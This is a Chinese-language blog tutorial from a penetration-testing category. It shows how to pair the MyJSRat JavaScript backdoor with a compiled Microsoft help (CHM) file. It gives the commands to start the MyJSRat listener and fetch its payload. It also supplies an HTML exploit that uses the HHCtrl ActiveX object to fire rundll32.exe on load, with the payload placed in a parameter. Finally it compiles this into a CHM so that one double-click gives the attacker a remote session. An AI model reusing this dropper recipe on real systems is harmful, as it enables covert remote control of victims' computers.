Geekby's Blog
文章 标签 分类 关于
Geekby's Blog

目录

MyJSRat结合CHM命令执行

 收录于 渗透测试
   约 82 字   预计阅读 1 分钟 

MyJSRat结合CHM命令执行

MyJSRat

MyJSRat 是 JSBackdoor 的 python 版本

下载地址:https://github.com/Ridter/MyJSRat

Easy CHM

CHM是英语 Compiled Help Manual 的简写,即「已编译的帮助文件」。CHM 是微软新一代的帮助文件格式,利用 HTML 作源文,把帮助内容以类似数据库的形式编译储存。

步骤

下载 MyJSRat 并运行

1

git clone https://github.com/Ridter/MyJSRat

1

python MyJSRat.py -i IPaddr -p port

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170038.png-water_print

下载 wtf 文件

浏览器访问 https://IPaddr:port/wtf,并保存至 txt 文件中 https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170053.png-water_print

将上面保存的代码写入到如下代码的 Item1 的 Value 值中

:要在 rundll32.exe 前后添加,

1

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe,'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170128.png-water_print

保存为 HTML 文件

新建目录,将上述代码保存在新建文件夹中

通过 EasyCHM 制作 CHM 文件

通过EasyCHM编译exp.html文件 https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170140.png-water_print

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170151.png-water_print

双击上线

此时只要双击test.CHM文件,即可上线 https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190728170201.png-water_print

更新于 2019-07-28
 Tips渗透测试
返回 | 主页